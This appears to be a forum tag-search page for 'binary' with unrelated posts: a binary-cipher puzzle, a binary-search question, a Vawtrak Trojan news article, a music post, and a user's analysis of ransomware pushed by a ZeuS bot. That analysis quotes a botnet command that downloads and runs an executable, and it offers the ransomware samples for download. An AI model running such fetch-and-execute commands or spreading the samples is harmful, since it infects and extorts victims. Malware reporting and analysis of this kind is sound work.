Search the Community
Showing results for tags 'binary'.
-
Am gasit urmatorul puzzle foarte interesant: During the recent BrainBashers cipher convention, a binary code contest took place. The contest consisted of a binary code transmission where the spaces between the letters were missing and there was no punctuation. Each letter of the alphabet was translated into its binary equivalent based on its position in the alphabet: a=1, b=10, c=11, d=100, e=101, f=110, g=111, h=1000, i=1001, j=1010, k=1011, l=1100, m=1101, n=1110, o=1111, p=10000, q=10001, r=10010, s=10011, t=10100, u=10101, v=10110, w=10111, x=11000, y=11001, z=11010. What is the answer to the question being asked? 110011101001000100110011100110011110110 101100101100110010011101101001111010111 001010010000101011101011010110010110011 010010001111101011111000101001001101001 011111111010111001001000101110010000100 111010011100111011101100110011100111011 000011001011000110101101100111010010011 111111010111100011010010011001111111110 101100001100101011001111111110101 Ma gandesc daca poate cineva sa il faca. PS:Eu am incercat dar m-am dat batut dupa primul rand.
-
Generic ransomware pushed to small ZeuS botnet machines by script: user_execute hxxp://ge.tt/api/1/files/4k8mPe82/0/blob?download >> (informations.exe) zeus script.png (835.88 KiB) Viewed 115 times ec2b6ecfc8ca67f9357b6550166a0838 informations.exe (UPX) 6ec6069728a91a04407283bc6bf208b7 UNPACKED Some generic ransomware junk..run in VM it asks for a password to decrypt files so I thought I would try to crack. winxp.png (590.39 KiB) Viewed 115 times I'm not a great RE like most ppl on here so I gave up and just patched the binary Change 00401C19 > JMP 0040124F (decryption routine) Attached are samples and patched binary in case anyone needs to unlock stuff... I was surprised, the malware does decrypt everything.. I did not look into the encryption routine or the password too much, but I'm sure someone around here can figure it out. Download Source
-
Singura chestie pe care nu o stiu este cum sa calculez total number of comparisons si average number( dupa cateva calcule, am ajuns la faptul ca pentru a vedea daca o valoare este sau nu acolo, nr de comparatii e log(n). Putin ajutor pt mai departe?
-
- binary
- comparisons
-
(and 3 more)
Tagged with:
-
Researchers have peeled back more layers on Vawtrak, a relatively new banking Trojan so complex that those who have taken it apart have likened it to a Matryoshka, or Russian nesting doll. Virus Bulletin published a deep dive on the malware penned by Raul Alvarez, a researcher with Fortinet, yesterday. Like a set of dominos, the malware involves a series of steps where each one triggers the next. In this case, the first executable binary triggers the second binary, but before doing so, it needs to decode it by calling a trio of APIs and decrypting a large block of data. “Vawtrak’s overlay area holds an encrypted copy of the executable binary that is used in the next layer. It is to be transferred and decrypted into the malware’s virtual memory space,” Alvarez writes. After calling another API, the malware also drops an image file, “Diana-23.jpg,” to con users into thinking that’s the only thing the executable does. After a series of modules are parsed and even more APIs are called upon the second layer of the malware, the .exe mainOUT-crypted-5, is decrypted and decompressed. By this point, following decompression, the malware has produced what Alvarez refers to as the “third doll” of the malware, an executable binary that’s the simplest of the four layers. Decrypting the large data block This part of Vawtrak has no protection at all, meaning no decryption or hashing is used. The third shell of the malware removes software restrictions and tries to restrict any permissions associated with any antimalware apps looking for it. Lastly, the fourth doll in this analogy, if everything has gone according to plan, decrypts data and produces a heap that contains an executable binary, a .DLL disguised as a .DAT file, with a random file name. Once deployed, the malware uses two more APIs, the RegCreateKeyA and RegSetValueExW to ensure the malware sticks around following a restart. While the malware which was first written about late last year was first thought to be targeting banks in Japan, Alvarez claims it’s “recently broadened its geographic scope” and has become more sophisticated over the last several months. “The ingenuity and skills shown by Vawtrak are not simple, but concise,” Alvarez writes in closing. In September researchers learned that Vawtrak, which was masquerading as Neverquest at the time, had evolved to target social media, retailers and game portals. Recent configurations allowed the malware to sniff out banking sessions, modify data in web traffic, break encryption and steal log-in credentials and other sensitive information. Source
-
Fresh upload , rate and hate!!! - - txtrrr ae :: [txtrrr ae - YouTube ] Automat -- Electrospectif (1997/2004 ) [http://discogs.com/Automat-Electrospectif-19972004/master/242367 ] - - Genre: Electronic Style: Techno, Electro - - Easily one of the top ten electro releases of the last decade. Automat produces dark, spacey, bass-heavy trax influenced by the classic Detroit operators but in a style that really isn't like anything else out there. Elements of acid and techno are successfully hybridized with a minimalist electro sensibility. His tracks are never cluttered--they seem spacious like the best dub, which lets the hard-hitting space marine drum programming and mind- and speaker-blowing basslines come to the fore. Seriously, I've listened to a lot of electro and Automat writes some of the best basslines I've ever heard; they slither and pulse as if his synths had evolved into new kinds of lifeforms. The synth work is insanely tweaked and distorted yet quite catchy at the same time. [#qpae ]